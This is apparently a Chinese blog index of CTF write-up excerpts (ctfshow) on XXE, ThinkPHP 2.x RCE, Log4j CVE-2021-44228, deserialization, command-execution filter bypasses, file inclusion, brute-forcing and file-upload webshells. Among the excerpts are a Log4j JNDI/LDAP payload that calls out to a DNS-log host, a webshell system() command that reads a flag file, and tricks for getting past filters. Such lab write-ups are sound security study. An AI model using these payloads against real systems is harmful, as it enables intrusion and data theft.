摘要: xxe XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 参考链接 xxe漏洞学习 --时光不改 web373 <?php /* # -*- codin 阅读全文
posted @ 2022-06-17 11:59 森sen 阅读(859) 评论(0) 推荐(0) 编辑
摘要: ##记一道利用原生类的web题 利用的是ctfshow中的一道比赛题目 题目源码提示 <!--?source--> 访问进入 <?php error_reporting(0); if(isset($_GET['source'])){ highlight_file(__FILE__); echo "\ 阅读全文
posted @ 2022-06-17 11:43 森sen 阅读(39) 评论(0) 推荐(0) 编辑
摘要: Thinkphp2 参考链接: jammny 漏斗社区 漏洞详情: ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\ 阅读全文
posted @ 2022-06-17 11:31 森sen 阅读(48) 评论(0) 推荐(0) 编辑
摘要: log4j(CVE-2021-44228) 简单测试 先利用DNSlog测试是否存在该漏洞: 传入payload: url/admin/cores?action=${jndi:ldap://(获取到的dns域名)/exp} 回到dnslog查看是否有解析记录 证明漏洞存在! 漏洞复现 工具地址: h 阅读全文
posted @ 2022-06-17 11:23 森sen 阅读(423) 评论(0) 推荐(0) 编辑
摘要: ##反序列化 先来点知识点 #####序列化和反序列化的概念: 序列化就是将对象转换成字符串。字符串包括 属性名 属性值 属性类型和该对象对应的类名。 反序列化则相反将字符串重新恢复成对象。 对象的序列化利于对象的保存和传输,也可以让多个文件共享对象。 serialize() (序列化)返回字符串, 阅读全文
posted @ 2022-03-08 13:41 森sen 阅读(950) 评论(0) 推荐(0) 编辑
摘要: ##php特性 ###web89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no 阅读全文
posted @ 2022-03-08 13:40 森sen 阅读(1475) 评论(0) 推荐(0) 编辑
摘要: 命令执行 rce 远程命令/代码执行漏洞 反引号`` 反引号即命令替换 是指Shell可以先执行中的命令,将输出结果暂时保存,在适当的地方输出 单引号,双引号 适用条件:过滤了字符串 放在shell命令中,绕过正则匹配且不影响原意 空格绕过 < <> 重定向符 %09(需要php环境) ${IFS} 阅读全文
posted @ 2022-03-08 13:39 森sen 阅读(494) 评论(0) 推荐(0) 编辑
摘要: ##文件包含 ###web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 用PHP伪协议php://filter来构造 源码中的include 阅读全文
posted @ 2022-03-08 13:36 森sen 阅读(2262) 评论(0) 推荐(0) 编辑
摘要: 爆破 ###web21 先打开网页,用bp抓包,报文中有一个base64编码,解密一下,发现是用户名:密码 使用custom iterator(自定义迭代器)模块,首先第一个放账号admin 第二个放个:第三个放个字典就可以了! 然后再进行base64编码! 这个要取消勾选 最后进行爆破,得到账号密 阅读全文
posted @ 2022-03-08 13:35 森sen 阅读(570) 评论(0) 推荐(0) 编辑
摘要: ##web151 上传一个png的一句话木马,并用bp抓包 找到木马路径upload/shell.php 关闭bp,观察文件是否上传成功,上传成功后会返回上传路径 文件上传成功后,直接访问upload/shell.php shell=system('tac ../f*'); ##web152 与上一 阅读全文
posted @ 2022-03-08 13:32 森sen 阅读(2543) 评论(0) 推荐(1) 编辑